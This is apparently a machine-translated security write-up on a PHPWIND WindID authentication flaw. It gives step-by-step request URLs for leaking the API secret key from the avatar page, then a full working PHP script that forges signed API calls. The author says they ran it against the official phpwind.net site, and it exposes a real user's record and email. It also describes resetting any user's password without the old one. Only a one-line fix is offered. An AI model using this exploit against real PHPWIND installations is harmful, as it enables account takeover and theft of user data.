A high-risk PHPWIND shell Vulnerability

A high-risk PHPWIND shell Vulnerability

I didn't expect PHPWIND to commit the same vulnerability as PHPCMS.

Code in src/applications/windidserver/api/controller/AppController. php:

public function listAction() {$result = $this->_getAppDs()->getList();$this->output($result);}

How do I obtain the key that can access the interface?

You can view the Avatar upload page:

/Phpwind/src/windid/service/user/srv/WindidUserService. php

Internal code:

$key = WindidUtility::appKey($appId, $time, $appKey, array('uid'=>$uid, 'type'=>'flash'), array('uid'=>'undefined'));

Go to the Avatar page and check the source file.

Http: // localhost/phpwind/index. php? M = profile & c = avatar & _ left = avatar

Urldecode:

Http: // localhost/phpwind/windid/index. php? M = api & c = avatar & a = doAvatar & uid = 1 & windidkey = f5b35f56c88695b9069e18ecaafad874 & time = 1408197299 & clientid = 1 & type = flash & avatar = http: // localhost/phpwind/windid/attachment/avatar/000/00/00/1 .jpg? R = 88418.


Remove

& Avatar = http: // localhost/phpwind/windid/attachment/avatar/000/00/00/1 .jpg? R = 88418.


Remember to POST a uid that is equal to undefined


Replace doAvatar with list and avatar with app:


Http: // localhost/phpwind/windid/index. php? M = api & c = app & a = list & uid = 1 & windidkey = f5b35f56c88695b9069e18ecaafad874 & time = 1408197299 & clientid = 1 & type = flash


POST: uid = undefined


D:

{"1": {"id": "1", "name": "phpwind9.0", "siteurl": "http: \/localhost \/phpwind ", "siteip": "", "secretkey": "73e3dcdd733c7c3733c17273a624e162", "apifile": "windid. php "," charset ":" gbk "," issyn ":" 1 "," ispolicy ":" 1 "}}

 

With this key, I can do too many things, and I can do everything in the user system.

With this key, I can do too many things, and I can do everything in the user system.

I tested it on the official website, obtained the key, and tested to read the information of a user:

<?php$secretkey = '308c6c43a*****279dd61dd80e8d59bd';$c = 'user';$a = 'get';$data = array('uid'=>'658925');$time = time();$key = appKey('1', time(), $secretkey, array('userid'=>658925), $data);echo post('http://www.phpwind.net/windid/index.php?m=api&c='.$c.'&a='.$a.'&windidkey='.$key.'&time='.$time .'&clientid=1&userid=658925',$data);function post($uri,$data) {$ch = curl_init ();curl_setopt ( $ch, CURLOPT_URL, $uri );curl_setopt ( $ch, CURLOPT_POST, 1 );curl_setopt ( $ch, CURLOPT_HEADER, 0 );curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, 1 );curl_setopt ( $ch, CURLOPT_POSTFIELDS, $data );$return = curl_exec ( $ch );curl_close ( $ch );return $return;}function appKey($apiId, $time, $secretkey, $get, $post) {$array = array('m', 'c', 'a', 'windidkey', 'clientid', 'time', '_json', 'jcallback', 'csrf_token', 'Filename', 'Upload', 'token');$str = '';ksort($get);ksort($post);foreach ($get AS $k=>$v) {if (in_array($k, $array)) continue;$str .=$k.$v;}foreach ($post AS $k=>$v) {if (in_array($k, $array)) continue;$str .=$k.$v;}return md5(md5($apiId.'||'.$secretkey).$time.$str);}?>

{"Uid": "658925", "username": "phpwind", "email": "fengyu@phpwind.net", "safecv": "5b4111de", "regdate ": "1143101940", "regip ":""}


There is also an edit interface in the User's api, which can modify the password of any User and call it. Without entering the old_password, you can change the password of any User without verifying the original password.

Solution:

Do not trust the key. You can add m, a, and c to the key operation.